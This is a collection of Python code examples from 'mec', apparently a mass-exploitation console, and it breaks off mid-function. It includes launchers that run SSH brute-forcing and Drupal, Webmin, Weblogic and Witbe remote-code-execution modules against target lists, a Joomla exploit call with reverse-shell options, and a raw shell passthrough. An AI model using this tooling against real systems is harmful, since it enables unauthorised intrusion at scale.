Esempio n. 1
def run_info(**kwargs):
    """
    Print the mec session settings and the Shadowsocks proxy state.

    Reads the ``session`` keyword argument. ``session.proxy_status`` is set
    to "OK" only when ``session.shadowsocks.is_usable()`` is true; otherwise
    the previous value is printed unchanged.
    """
    session = kwargs.get("session", None)
    ss = session.shadowsocks

    if ss.is_usable():
        session.proxy_status = "OK"

    report = f'''
session
-------

[*] Current directory: {os.getcwd()}
[*] Root directory: {session.init_dir}
[*] Log file: {session.logfile}
[*] Target: {session.ip_list}

PROXY
-----

[*] Shadowsocks config: {ss.ss_url}
[*] Shadowsocks local port: {ss.local_port}
[*] Shadowsocks connectivity: {session.proxy_status}
'''
    colors.colored_print(report, colors.CYAN)
Esempio n. 2
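def _write_private(path, text):
    '''
    write text to path and restrict the file to its owner (mode 0600)
    '''
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as handle:
        handle.write(text)
    # the mode given to os.open only applies to newly created files
    os.chmod(path, 0o600)


def start_install():
    '''
    installation procedure

    Copies the working tree to ~/.mec, creates a virtualenv there, installs
    the Python dependencies, optionally stores ZoomEye / Censys credentials
    under MECROOT/conf, and installs the `mec` launcher into /usr/local/bin.
    Exits with status 1 when the virtualenv cannot be created.
    '''
    # virtualenv
    os.system('mkdir ~/.mec')
    os.system('cp -R ./* ~/.mec')
    # os.path does not expand "~" (only the shell does), so the check has to
    # run on the expanded path or it is always False
    if not os.path.isdir(os.path.expanduser("~/.mec/.venv")):
        if os.system("virtualenv -p /usr/bin/python3 ~/.mec/.venv") != 0:
            colors.colored_print("Error setting up virtualenv", colors.RED)
            sys.exit(1)

    # left unexpanded on purpose: pip_install hands it to a shell
    venv_py = "~/.mec/.venv/bin/python3"

    # NOTE(review): every package below is installed unpinned from the
    # configured index; a pinned requirements file with `--require-hashes`
    # would make the install reproducible and tamper-evident.
    # for user interface and autocompletion
    pip_install(venv_py, 'readline')
    # for HTTP jobs
    pip_install(venv_py, 'requests')
    # psutil for killing procs by name
    pip_install(venv_py, 'psutil')
    # tqdm for progress bar
    pip_install(venv_py, 'tqdm')
    # install beautifulsoup4 if not already installed
    pip_install(venv_py, 'bs4')
    # install HTML5lib if not already installed
    pip_install(venv_py, 'html5lib')
    # install docopt if not already installed
    pip_install(venv_py, 'docopt')
    print(colors.BLUE + "Done installing dependencies, now copying files." +
          colors.END)

    # clean temp files.
    os.system('rm -rf ~/.mec/mec')
    os.system('rm -rf ~/.mec/install.py')

    # zoomeye account:
    zoomeye = input('Would you like to use zoomeye? (yes/No) ').lower()
    if zoomeye in ('yes', 'y'):
        # NOTE(review): the listing masks part of this branch; the prompts and
        # the two-line "key:value" format are reconstructed from what is still
        # visible and from the censys branch below -- confirm against upstream.
        user = input('Username: ')
        password = getpass.getpass('Password: ')
        # credentials are stored in clear text, so keep the file owner-only
        _write_private(MECROOT + '/conf/zoomeye.conf',
                       "user:" + user + "\n" + "password:" + password + "\n")
    censys = input('Would you like to use censys? (yes/No) ').lower()
    if censys in ('yes', 'y'):
        uid = input('API ID: ')
        sec = getpass.getpass('Secret: ')
        key = {"uid": uid, "sec": sec}
        _write_private(MECROOT + '/conf/censys.conf', json.dumps(key))

    if not os.path.isfile("/usr/local/bin/mec"):
        # add mec to $PATH
        os.system('sudo cp mec /usr/local/bin/')

        # fix permissions
        os.system('sudo chmod +x /usr/local/bin/mec && chmod +x ~/.mec/mec.py')

    print(colors.GREEN + colors.BOLD + "Installation completed. try: $ mec" +
          colors.END)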
Esempio n. 3
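def run_search(query, pages):
    """
    Collect Censys host results for *query* and append them to a file.

    Returns the path of the output file (``data/censys_<sanitised query>.txt``,
    relative to the current directory), or "" when the account check returns
    an empty string.
    """
    censys_search = CensysSearch()

    # check account
    account_info = censys_search.query_account()

    if account_info == "":
        return ""
    colors.colored_print(account_info, colors.BLUE)

    hosts = []
    # NOTE(review): this requests pages 1 .. pages+1, exactly as the original
    # `while i <= int(pages)` loop with its leading increment did -- confirm
    # whether the extra page is intended.
    for page in range(1, int(pages) + 2):
        sys.stdout.flush()
        sys.stdout.write(
            f"{colors.BLUE}[+] Crawling page {page}...{colors.END}\r")

        # multi thread causes temp ban.
        hosts.extend(censys_search.search_hosts(query, page))
    print()

    # the query becomes part of a file name: neutralise quotes, ':' and '!',
    # and both path separators so the result cannot leave data/
    unsafe = str.maketrans({ch: '-' for ch in '"\':!\\/'})
    file = 'data/censys_' + (query + ".txt").translate(unsafe)

    print(str(len(hosts)) + " Host found.")
    # context manager: the handle is flushed and closed before the path is
    # handed back to the caller
    with open(file, "a") as out:
        out.write("\n".join(str(x) for x in hosts))

    return file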
Esempio n. 4
File: cmd.py Progetto: wangroot/mec
def run_info(**kwargs):
    """
    Print the mec session settings and the Shadowsocks proxy state.

    Expects a ``session`` keyword argument; when it is missing an error is
    printed and nothing else happens.
    """
    session = kwargs.get("session", None)

    if session is None:
        console.print_error("[-] info: session not exist")
        return

    # reload the user config file before reporting
    session.read_config()

    ss = session.shadowsocks
    if ss.is_usable():
        session.proxy_status = "OK"

    report = f'''
session
-------

[*] Auto-Update: {session.auto_update}
[*] Current directory: {os.getcwd()}
[*] Root directory: {session.init_dir}
[*] Log file: {session.logfile}
[*] Target: {session.ip_list}

proxy
-----

[*] Shadowsocks config: {ss.ss_url}
[*] Shadowsocks local port: {ss.local_port}
[*] Shadowsocks connectivity: {session.proxy_status}
'''
    colors.colored_print(report, colors.CYAN)
Esempio n. 5
def ssh_bruteforcer(session):
    '''
    ask the operator for a password list and a command, then build the
    Scanner job for the ssh-bruteforce module

    Returns None when the chosen password list is not a regular file.
    '''
    colors.colored_print('\n[*] Welcome to SSH bruteforcer', colors.BLUE)

    # only *.txt files already present under MECROOT/data are offered
    wordlists = glob.glob(core.MECROOT+"/data/*.txt")
    password_list = console.input_check(
        "[*] Password list file to use (put them under ./data): ",
        allow_blank=False, choices=wordlists)

    if not os.path.isfile(password_list):
        console.print_error("[-] Password list not found")
        return None

    # free-form operator input, forwarded to the module as the "-c" argument
    command = console.input_check("[*] Command to exec: ", allow_blank=False)

    # module script, its working directory and its arguments
    script = 'ssh_bruteforce.py'
    module_args = ["-p", password_list, "-c", command]

    return core.Scanner('/ssh-bruteforce/', script, module_args, 100, session)
Esempio n. 6
File: main.py Progetto: jm33-m0/mec
def main():
    '''
    interactive console loop: prompt for a command, dispatch it, repeat
    '''
    colors.colored_print("[*] Default target list is ./data/ip_list.txt",
                         colors.CYAN)
    SESSION.ip_list = SESSION.init_dir + '/data/ip_list.txt'

    # write this process's PID to the session pidfile
    futil.write_file(text=str(os.getpid()), filepath=SESSION.pidfile)

    while True:
        try:
            # always prompt from MECROOT, whatever directory we ended up in
            if os.getcwd() != core.MECROOT:
                os.chdir(core.MECROOT)
            input_cmd = rlinit.prompt(session=SESSION)

            try:
                cmd.cmd_handler(SESSION, input_cmd)
            except (KeyboardInterrupt, EOFError, SystemExit):
                # an interrupt inside a command ends the whole console
                sys.exit(0)

        except KeyboardInterrupt:
            # Ctrl-C at the prompt: confirm, stop the proxy helper, then exit
            if console.yes_no("\n[?] Are you sure to exit?"):
                futil.check_kill_process('ss-proxy')
                sys.exit(0)

        except FileNotFoundError:
            console.print_error(f"[-] {core.MECROOT} not found???")
            sys.exit(1)
Esempio n. 7
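def run_check_proxy_pool(**kwargs):
    """
    check if proxy_pool is usable

    Reloads the session config, then probes tor (SOCKS5 on 127.0.0.1:9050)
    and the proxy chain in a child process and prints both results.
    Prints an error and returns when no ``session`` keyword is given, and a
    warning when ``session.proxy_pool_api`` is empty.
    """
    session = kwargs.get("session", None)

    # guard before the first attribute access: the original only tested for
    # None inside the worker, after session.read_config() had already run
    if session is None:
        console.print_error("[-] info: session not exist")
        return

    # update via user config file
    session.read_config()

    if session.proxy_pool_api == '':
        console.print_warning("[!] proxy_pool_api not configured")
        return

    def check_tor():
        # reachability probe only: the response itself is never read
        try:
            requests.get("http://ifconfig.me", timeout=10,
                         proxies=dict(http='socks5://127.0.0.1:9050',
                                      https='socks5://127.0.0.1:9050'))
        except BaseException:
            # deliberately broad: any failure in the child, an interrupt
            # included, is reported as "not connected"
            return False

        return True

    def run_check(res):
        # runs in the child process; results travel back through the
        # manager dict
        res['tor_status'] = "OK" if check_tor() else "DISCONNECTED"
        res['proxy_status'] = "OK" if session.test_proxy() else "DISCONNECTED"

    # NOTE(review): a nested function as Process target presumably relies on
    # the fork start method -- confirm before running where spawn is default
    res = Manager().dict()
    proc = Process(target=run_check, args=(res,))
    proc.start()
    console.print_status(
        "[*] please wait while checking proxy chain connectivity...",
        proc
    )
    proc.join()

    # fall back to "Unknown" when the child died before writing a result
    tor_status = res.get('tor_status', "Unknown")
    session.proxy_status = res.get('proxy_status', "Unknown")
    colors.colored_print(f"""
proxy
-----

[*] proxy_pool API: {session.proxy_pool_api}
[*] tor connectivity: {tor_status}
[*] proxy chain connectivity: {session.proxy_status}
""", colors.CYAN)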
Esempio n. 8
def pkg_install(pkg_mgr, pkg):
    '''
    install package via system package manager

    Runs "<pkg_mgr> <pkg> -y" through the shell and prints a warning when
    the command exits non-zero.
    '''
    # both values are interpolated into a shell command line unquoted, so
    # they must come from the installer itself, never from external input
    status = os.system(f"{pkg_mgr} {pkg} -y")
    if status == 0:
        return

    warning = f"Could not install {pkg}, some pypi packages might fail to install"
    colors.colored_print(warning, colors.RED)
Esempio n. 9
def run_init(**kwargs):
    """
    Change the working directory back to the session's init directory.
    """
    init_dir = kwargs.get("session").init_dir

    colors.colored_print('[*] Going back to init_dir...', colors.BLUE)
    os.chdir(init_dir)
Esempio n. 10
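def _write_private(path, text):
    '''
    write text to path and restrict the file to its owner (mode 0600)
    '''
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as handle:
        handle.write(text)
    # the mode given to os.open only applies to newly created files
    os.chmod(path, 0o600)


def start_install():
    '''
    installation procedure

    Copies the working tree to ~/.mec, creates a virtualenv there, installs
    the dependencies listed in requirements.txt, optionally stores ZoomEye /
    Censys credentials under MECROOT/conf, and installs the `mec` launcher
    into /usr/local/bin. Exits with status 1 when the virtualenv cannot be
    created.
    '''
    # virtualenv
    os.system('mkdir ~/.mec')
    os.system('cp -R ./* ~/.mec')
    # os.path does not expand "~" (only the shell does), so the check has to
    # run on the expanded path or it is always False
    if not os.path.isdir(os.path.expanduser("~/.mec/.venv")):
        if os.system("virtualenv -p /usr/bin/python3 ~/.mec/.venv") != 0:
            colors.colored_print("Error setting up virtualenv", colors.RED)
            sys.exit(1)

    # left unexpanded on purpose: pip_install hands it to a shell
    venv_py = "~/.mec/.venv/bin/python3"

    # use requirements.txt
    # the "-r <file>" pair is passed as one string and split by the shell
    pip_install(venv_py, '-r requirements.txt')

    print(colors.BLUE + "Done installing dependencies, now copying files." +
          colors.END)

    # clean temp files.
    os.system('rm -rf ~/.mec/mec')
    os.system('rm -rf ~/.mec/install.py')

    # zoomeye account:
    zoomeye = input('Would you like to use zoomeye? (yes/No) ').lower()
    if zoomeye in ('yes', 'y'):
        # NOTE(review): the listing masks part of this branch; the prompts and
        # the two-line "key:value" format are reconstructed from what is still
        # visible and from the censys branch below -- confirm against upstream.
        user = input('Username: ')
        password = getpass.getpass('Password: ')
        # credentials are stored in clear text, so keep the file owner-only
        _write_private(MECROOT + '/conf/zoomeye.conf',
                       "user:" + user + "\n" + "password:" + password + "\n")
    censys = input('Would you like to use censys? (yes/No) ').lower()
    if censys in ('yes', 'y'):
        uid = input('API ID: ')
        sec = getpass.getpass('Secret: ')
        key = {"uid": uid, "sec": sec}
        _write_private(MECROOT + '/conf/censys.conf', json.dumps(key))

    if not os.path.isfile("/usr/local/bin/mec"):
        # add mec to $PATH
        os.system('sudo cp mec /usr/local/bin/')

        # fix permissions
        os.system('sudo chmod +x /usr/local/bin/mec && chmod +x ~/.mec/mec.py')

    print(colors.GREEN + colors.BOLD + "Installation completed. try: $ mec" +
          colors.END)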
Esempio n. 11
def run_exploits(**kwargs):
    """
    List the exploit modules reported by ``futil.list_exp()``.

    With ``do_print=False`` the list is returned (for the readline
    completer) and nothing is printed; otherwise the names are printed and
    None is returned.
    """
    exp_list = futil.list_exp()

    if kwargs.get("do_print", True):
        colors.colored_print('[+] Available exploits: ', colors.CYAN)
        for poc in exp_list:
            colors.colored_print(poc, colors.BLUE)
        return None

    # pass this list to readline completer
    return exp_list
Esempio n. 12
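def run_target(**kwargs):
    """
    Change target list

    Takes the new list's file name from the first element of ``args`` and
    accepts it only when a file of that name exists directly under
    ``<session.init_dir>/data``.
    """
    session = kwargs.get("session")
    args = kwargs.get("args")

    # `target` typed without an argument used to raise IndexError (or
    # TypeError when args was None) instead of reporting the problem
    if not args:
        console.print_error("[-] target: no target list given")

        return
    target = args[0]

    # membership in the directory listing also rejects names containing a
    # path separator, so the new path cannot point outside data/
    if target not in os.listdir(session.init_dir + '/data'):
        console.print_error("[-] Target file not found")

        return
    colors.colored_print('[i] Target changed to {}'.format(target),
                         colors.BLUE)
    session.ip_list = session.init_dir + \
        '/data/' + target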
Esempio n. 13
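def run_censys(**kwargs):
    """
    Crawler for Censys.io

    Runs ``censys.start()`` and, when the operator agrees, makes its output
    file the session's target list. An interrupt ends the command quietly;
    any other failure is reported instead of being swallowed.
    """
    session = kwargs.get("session", None)

    try:
        output = censys.start()

        if console.yes_no("\n[?] Use collected URLs as target?"):
            session.ip_list = session.init_dir + "/" + output
            colors.colored_print(
                '[i] Target changed to {}'.format(
                    session.ip_list), colors.BLUE)

    except (EOFError, KeyboardInterrupt, SystemExit):
        # operator aborted: same quiet return as before
        return
    except Exception as exc:
        # the original `except BaseException: return` hid every failure,
        # including a missing session and API or file errors
        console.print_error(f"[-] censys: {exc}")
        return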
Esempio n. 14
def run_info(**kwargs):
    """
    Print the mec session settings after reloading the user config file.
    """
    session = kwargs.get("session", None)
    # update via user config file
    session.read_config()

    report = f'''
session
-------

[*] Auto-Update: {session.auto_update}
[*] Current directory: {os.getcwd()}
[*] Root directory: {session.init_dir}
[*] Log file: {session.logfile}
[*] Target: {session.ip_list}
'''
    colors.colored_print(report, colors.CYAN)
Esempio n. 15
def run_target(**kwargs):
    """
    Switch the session to another target list under ``<init_dir>/data``.

    The file name is the first element of ``args``; it is accepted only when
    the data directory's listing contains it.
    """
    session = kwargs.get("session")
    try:
        target = kwargs.get("args")[0]
    except IndexError:
        console.print_error("[-] What target?")
        return

    data_dir = session.init_dir + '/data'

    # matching against the listing also rules out names with a path separator
    if target not in os.listdir(data_dir):
        console.print_error(f"[-] Target list file '{target}' not found")
        return

    colors.colored_print(f'[i] Target list changed to {target}', colors.BLUE)
    session.ip_list = data_dir + '/' + target
Esempio n. 16
def drupal_cve20196340(session):
    '''
    prompt for the command argument and return the Scanner job for the
    Drupal CVE-2019-6340 module
    '''
    colors.colored_print('\n[*] Welcome to Drupal CVE-2019-6340', colors.BLUE)

    # free-form operator input, forwarded to the module as "-c"
    command = console.input_check('[?] Command to execute on the target: ',
                                  allow_blank=False)

    # module script and its arguments
    script = 'cve-2019-6340_cmd.py'
    module_args = ["-c", command]

    # 50 jobs; 0.1 is passed positionally before the session -- presumably
    # the delay between process launches, confirm against core.Scanner
    return core.Scanner('/drupal/', script, module_args, 50, 0.1, session)
Esempio n. 17
def webmin_cve_2019_15107(session):
    '''
    prompt for the command argument and return the Scanner job for the
    Webmin CVE-2019-15107 module
    '''
    colors.colored_print('\n[*] Welcome to Webmin CVE-2019-15107', colors.BLUE)

    # free-form operator input, forwarded to the module as "-c"
    command = console.input_check(
        '[?] Command to execute on the target: ', allow_blank=False)

    # module script and its arguments
    script = 'webmin.py'
    module_args = ["-c", command]

    return core.Scanner('/webmin/', script, module_args, 50, session)
Esempio n. 18
def witbe(session):
    '''
    prompt for a listener address and port and return the Scanner job for
    the witbe module
    '''
    colors.colored_print('\n[*] Welcome to Witbe RCE', colors.BLUE)

    # listener address is validated as an IP, the port as an int
    rhost = console.input_check('[?] IP of your shell server: ', ip_check=True)
    rport = console.input_check('[?] and Port? ', check_type=int)

    # module script and its arguments
    script = 'witbe.py'
    module_args = ["-l", rhost, "-p", rport]

    return core.Scanner('/witbe/', script, module_args, 50, session)
Esempio n. 19
def weblogic_cve201710271(session):
    '''
    prompt for the command argument and return the Scanner job for the
    Weblogic CVE-2017-10271 module
    '''
    colors.colored_print(
        '\n[*] Welcome to Weblogic CVE-2017-10271', colors.BLUE)

    # free-form operator input, forwarded to the module as "-c"
    command = console.input_check(
        '[?] Command to execute on the target: ', allow_blank=False)

    # module script and its arguments
    script = 'weblogic_cve-2017-10271.py'
    module_args = ["-c", command]

    return core.Scanner('/weblogic/', script, module_args, 50, session)
Esempio n. 20
File: cmd.py Progetto: m4rm0k/mec
def run_exploits(**kwargs):
    """
    List the exploit modules reported by ``futil.list_exp()``.

    When the list is empty an error is printed and the operator is offered
    the `info` view. With ``do_print=False`` the list is returned and not
    printed; otherwise the names are printed and None is returned.
    """
    exp_list = futil.list_exp()
    total = len(exp_list)

    if total == 0:
        console.print_error("[-] No exploits found")
        if console.yes_no("[?] Perhaps you need to check `info`?"):
            run_info(session=kwargs.get("session"))

    if kwargs.get("do_print", True):
        colors.colored_print(f"[+] {total} available exploits: ",
                             colors.CYAN)
        for poc in exp_list:
            colors.colored_print(poc, colors.BLUE)
        return None

    return exp_list
Esempio n. 21
File: cmd.py Progetto: m4rm0k/mec
def run_baidu(**kwargs):
    """
    Run the Baidu search spider and optionally adopt its results as targets.

    ``args`` holds the search term and the result count. The spider runs
    from ``session.out_dir``; when the operator agrees, the session's target
    list becomes ``<out_dir>/result.txt``.
    """
    session = kwargs.get("session")
    command = kwargs.get("args")

    try:
        dork, count = command[0], int(command[1])
        os.chdir(session.out_dir)
        colors.colored_print('[*] Searching on Baidu...', colors.PURPLE)
        baidu.spider(dork, count)

        use_results = console.yes_no("\n[?] Use collected URLs as target?")
        if use_results:
            session.ip_list = session.out_dir + "/result.txt"

    except (EOFError, KeyboardInterrupt, SystemExit):
        console.print_warning("[-] Interrupted")
        return
    except BaseException as exc:
        # everything else (missing or non-numeric arguments included) is
        # reported together with debug output
        console.print_error(f"[-] Error: {exc}")
        console.debug_except()
Esempio n. 22
def weblogic_cve201710271(session):
    '''
    prompt for the command and target OS and return the Scanner job for the
    Weblogic CVE-2017-10271 module
    '''
    colors.colored_print('\n[*] Welcome to Weblogic CVE-2017-10271',
                         colors.BLUE)

    # free-form operator input, forwarded to the module as "-c"
    command = console.input_check('[?] Command to execute on the target: ',
                                  allow_blank=False)
    # restricted by input_check to the two listed values
    target_os = console.input_check(
        "[?] Target OS, default to linux [linux/win]: ",
        choices=["linux", "win"])

    # module script and its arguments
    script = 'weblogic_cve-2017-10271.py'
    module_args = ["-c", command, "-os", target_os]

    # 50 jobs; 0.1 is passed positionally before the session -- presumably
    # the delay between process launches, confirm against core.Scanner
    return core.Scanner('/weblogic/', script, module_args, 50, 0.1, session)
Esempio n. 23
def execute(cmd):
    '''
    handles user input in console

    Normalises the input (string, lower-cased, stripped) and dispatches on
    it. Built-in commands are matched first; anything that matches none of
    them is handed to the system shell as typed (see the final branch).
    Returns None on every path; `q` / `quit` exits the process.
    '''

    # lol i don't want any errors here
    # note: lower-casing applies to the whole line, arguments included
    cmd = str(cmd).lower().strip()

    if cmd == '':
        return
    elif cmd == 'info':
        # print working directory, session paths and the proxy config path
        colored_print(
            '[*] Current directory: {}\
            \n[*] Init directory: {}\
            \n[*] Log file: {}\
            \n[*] Target: {}\
            \n[*] Proxy config: {}'.format(
                os.getcwd(),
                SESSION.init_dir,
                SESSION.logfile,
                SESSION.ip_list,
                SESSION.proxy_conf),
            colors.CYAN)

    elif cmd.startswith('target'):
        # everything after the first word, with whitespace removed
        target = ''.join(cmd.split()[1:])
        # accept only names present in <init_dir>/data; unknown names are
        # dropped without any message
        if target not in os.listdir(SESSION.init_dir + '/data'):
            return
        colored_print('[i] Target changed to {}'.format(target), colors.BLUE)
        SESSION.ip_list = SESSION.init_dir + \
            '/data/' + target

    elif cmd == 'init' or cmd == 'i':
        colored_print('[*] Going back to init_dir...', colors.BLUE)
        os.chdir(SESSION.init_dir)

    elif cmd.startswith('baidu'):
        # expected form: baidu <dork> <count>
        try:
            command = cmd.strip().split()
            dork = command[1]
            count = int(command[2])
            os.chdir(SESSION.out_dir)
            colored_print('[*] Searching on Baidu...', colors.PURPLE)
            baidu.spider(dork, count)
        # NOTE(review): a non-numeric count raises ValueError, which is not
        # in this tuple and so propagates to the caller
        except (IndexError, EOFError, KeyboardInterrupt, SystemExit):
            return

    elif cmd == 'proxy':
        # NOTE(review): a missing config is reported, but the proxy binary
        # is started regardless
        if not os.path.exists(SESSION.ss_config):
            console.print_error(
                '[-] Please make sure {} exists'.format(SESSION.ss_config))
        try:
            # argument list with shell=False: no shell parsing of the paths.
            # NOTE(review): both pipes are created but never read in this
            # function
            subprocess.Popen(
                [SESSION.proxy_bin,
                 '-c',
                 SESSION.ss_config],
                stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=False)
        except BaseException as err:
            console.print_error(
                '[-] Error starting Shadowsocks proxy: ' + str(err))
            debug_except()

    elif cmd == 'redis':
        console.print_error('[-] Under development')

    elif cmd.startswith('google'):
        try:
            cmd = cmd.strip().split()
            dork = cmd[1]
            # well yes im a lazy guy
            # runs a bundled script with hard-coded listener options; only
            # the dork comes from the operator
            subprocess.call(['./exploits/joomla/joomlaCVE-2015-8562.py',
                             '--dork', dork,
                             '--revshell=\'127.0.0.1\'',
                             '--port=4444'])
        except BaseException as err:
            console.print_error(str(err))
            debug_except()

    elif cmd == 'q' or cmd == 'quit':
        # stop the proxy helper before leaving
        check_kill_process('ss-proxy')
        sys.exit(0)

    elif cmd == 'h' or cmd == 'help' or cmd == '?':
        print(console.HELP_INFO)

    elif cmd == 'exploits':
        colored_print('[+] Available exploits: ', colors.CYAN)
        for poc in list_exp():
            colored_print(poc, colors.BLUE)

    elif cmd == 'z' or cmd == "zoomeye":
        try:
            zoomeye.run()
        except (EOFError, KeyboardInterrupt, SystemExit):
            pass
        # NOTE(review): this `else` runs when zoomeye.run() raised nothing,
        # so debug_except() is called on success -- looks unintended, confirm
        else:
            debug_except()

    elif cmd == 'x' or cmd == 'clear':
        os.system("clear")

    elif cmd == 'c' or cmd == 'reset':
        os.system("reset")

    elif cmd == "attack" or cmd == "e":
        attack()

    else:
        # fallback: the (lower-cased) line is executed by the system shell
        # with the privileges of the mec process. This is a shell
        # passthrough; nothing here validates or restricts the input.
        try:
            print(
                colors.BLUE +
                colors.BOLD +
                "[*] Exec: " +
                colors.END +
                colors.GREEN +
                cmd +
                colors.END +
                '\n')
            os.system(cmd)
        except (EOFError, KeyboardInterrupt, SystemExit):
            pass
Esempio n. 24
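def mod_exists(modulename):
    '''
    check if a module exists without importing it

    Returns True when an import spec is found, False otherwise. For a
    dotted name the parent packages are imported by find_spec; a missing
    parent counts as "does not exist" instead of raising.
    '''
    try:
        return util.find_spec(modulename) is not None
    except ImportError:
        # find_spec("pkg.sub") raises ModuleNotFoundError when "pkg" itself
        # cannot be imported
        return False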


# distro check and initial packages
# Determine the distribution id (DIST). "debian" is only the initial value;
# it is overwritten by one of the two lookups at the bottom.
DIST = "debian"
try:
    import distro

except ModuleNotFoundError:
    # NOTE(review): this installs an unpinned package from the configured
    # index as a side effect of running the installer; a non-zero exit is
    # treated as "pip is missing"
    if os.system("python3 -m pip install distro --user") != 0:
        colors.colored_print("Please install pip first !!!", colors.RED)
        sys.exit(1)
    # import only if the fresh install is visible to this interpreter;
    # otherwise `distro` stays undefined and the NameError path below runs
    if mod_exists("distro"):
        import distro

except ImportError:
    # NOTE(review): ModuleNotFoundError (3.6+) is a subclass of ImportError,
    # so this branch only sees other import failures
    colors.colored_print("Please use python 3.6+ !!!", colors.RED)
    sys.exit(1)

try:
    DIST = distro.linux_distribution(full_distribution_name=False)[0]
except NameError:
    # `distro` was never imported: fall back to the standard library
    import platform
    # NOTE(review): platform.linux_distribution was removed in Python 3.8,
    # so this fallback raises AttributeError on current interpreters
    # pylint: disable=deprecated-method
    DIST = platform.linux_distribution(full_distribution_name=0)[0].lower()
Esempio n. 25
def attack():
    '''
    handles attack command

    Interactive flow: optionally start the proxy, then either pick one of
    the numbered built-in modules or assemble a job for a module chosen by
    path, and hand the job to scanner(). Returns None on every path.
    '''
    SESSION.use_proxy = input_check(
        '[?] Do you wish to use proxychains? [y/n] ', choices=['y',
                                                               'n']) == 'y'
    if SESSION.use_proxy:
        # refuse to continue when the proxychains4 binary is not on PATH
        if shutil.which("proxychains4") is None:
            console.print_error("proxychains4 not found")
            return
        execute("proxy")
    answ = input_check('\n[?] Do you wish to use\
        \n\n    [a] built-in exploits\
        \n    [m] or launch your own manually?\
        \n\n[=] Your choice: ',
                       choices=['a', 'm'])
    if answ == 'a':
        print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' +
              colors.END + '\n')
        print(console.BUILT_IN)
        # NOTE(review): check_type=int is combined with string choices and
        # string comparisons below -- presumably input_check returns the raw
        # string; confirm
        answ = input_check('[=] Your choice: ',
                           check_type=int,
                           choices=['0', '1', '2', '3', '4'])

        try:
            if answ == '0':
                scanner(exploit_exec.ssh_bruteforcer())
            elif answ == '1':
                scanner(exploit_exec.weblogic())
            elif answ == '2':
                console.print_error("[-] Not available")
            elif answ == '3':
                console.print_error("[-] Not available")
            elif answ == '4':
                scanner(exploit_exec.s2_045())

        except (EOFError, KeyboardInterrupt, SystemExit):
            return

    elif answ == 'm':
        print(colors.CYAN + colors.UNDERLINE + colors.BOLD +
              "\nWelcome, in here you can choose your own exploit\n" +
              colors.END)
        colored_print('[*] Here are available exploits:\n', colors.CYAN)

        for poc in list_exp():
            colored_print(poc + colors.END, colors.BLUE)

        # the path is restricted to the entries list_exp() returns
        exploit = input_check(
            "\n[*] Enter the path (eg. joomla/rce.py) of your exploit: ",
            choices=list_exp())

        jobs = int(
            input_check("[?] How many processes each time? ", check_type=int))

        custom_args = []
        answ = input_check("[?] Do you need a reverse shell [y/n]? ",
                           choices=['y', 'n'])
        if answ == 'y':
            # listener address is validated as an IP, the port as an int
            lhost = input_check("[*] Where do you want me to send shells? ",
                                allow_blank=False,
                                ip_check=True)
            lport = input_check("[*] and at what port?", check_type=int)
            custom_args = ['-l', lhost, '-p', lport]
        else:
            pass

        # extra arguments are split on whitespace only; quoting is not
        # honoured
        custom_args += input_check(
            "[*] args for this exploit: ").strip().split()

        # parse user's exploit name
        # exec_path drops the first path component, work_path the last one;
        # for "joomla/rce.py" that gives "rce.py" and "joomla". With more
        # than two components the two values overlap.
        exec_path = exploit.split('/')[1:]
        work_path = exploit.split('/')[:-1]
        exec_path = '/'.join(exec_path)
        work_path = '/'.join(work_path)

        # let user check if there's anything wrong
        # NOTE(review): ' '.join(custom_args) needs every element to be a
        # str -- depends on what input_check returns for lport; confirm
        print(
            colors.BLUE + '[*] Your exploit will be executed like\n' +
            colors.END,
            'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(
                exec_path), ' '.join(custom_args))

        # args as parameter for scanner
        scanner_args = console.ScannerArgs(work_path, exec_path, custom_args,
                                           jobs)
        # start scanner
        scanner(scanner_args)

    else:
        # reached only if input_check returns something outside its choices
        console.print_error('[-] Invalid input')
Esempio n. 26
def execute(cmd):
    '''
    handles user input in console

    Normalises the input (string, lower-cased, stripped) and dispatches on
    it. Built-in commands are matched first; anything that matches none of
    them is handed to the system shell as typed (see the final branch).
    Returns None on every path; `q` / `quit` exits the process.
    '''

    # lol i don't want any errors here
    # note: lower-casing applies to the whole line, arguments included
    cmd = str(cmd).lower().strip()

    if cmd == '':
        return
    if cmd == "masscan":
        # check root, as masscan requires root privilege
        if os.geteuid() != 0:
            console.print_error(
                "[-] Please run mec as root in order to run masscan")
            return

        # whitespace-separated list; the values are passed on unvalidated
        ports = console.input_check(
            "[?] What ports do you want to scan (eg. 80 443)? ").split()

        try:
            scan.masscan(ports)
        except KeyboardInterrupt:
            console.print_warning("[-] masscan exited")
    elif cmd == 'info':
        # print working directory, session paths and the proxy config path
        colored_print(
            '[*] Current directory: {}\
            \n[*] Init directory: {}\
            \n[*] Log file: {}\
            \n[*] Target: {}\
            \n[*] Proxy config: {}'.format(os.getcwd(), SESSION.init_dir,
                                           SESSION.logfile, SESSION.ip_list,
                                           SESSION.proxy_conf), colors.CYAN)

    elif cmd.startswith('target'):
        # everything after the first word, with whitespace removed
        target = ''.join(cmd.split()[1:])
        # accept only names present in <init_dir>/data
        if target not in os.listdir(SESSION.init_dir + '/data'):
            console.print_error("[-] Target file not found")
            return
        colored_print('[i] Target changed to {}'.format(target), colors.BLUE)
        SESSION.ip_list = SESSION.init_dir + \
            '/data/' + target

    elif cmd in ('init', 'i'):
        colored_print('[*] Going back to init_dir...', colors.BLUE)
        os.chdir(SESSION.init_dir)

    elif cmd.startswith('baidu'):
        # expected form: baidu <dork> <count>
        try:
            command = cmd.strip().split()
            dork = command[1]
            count = int(command[2])
            os.chdir(SESSION.out_dir)
            colored_print('[*] Searching on Baidu...', colors.PURPLE)
            baidu.spider(dork, count)

            # NOTE(review): the spider ran in out_dir, but this path is built
            # from init_dir and has no "/" before the file name -- confirm
            # where result.txt is actually written
            if yes_no("Use collected URL's as target?"):
                SESSION.ip_list = SESSION.init_dir + "result.txt"

        # NOTE(review): a non-numeric count raises ValueError, which is not
        # in this tuple and so propagates to the caller
        except (IndexError, EOFError, KeyboardInterrupt, SystemExit):
            return

    elif cmd == 'proxy':
        # NOTE(review): a missing config is reported, but the proxy binary
        # is started regardless
        if not os.path.exists(SESSION.ss_config):
            console.print_error('[-] Please make sure {} exists'.format(
                SESSION.ss_config))
        try:
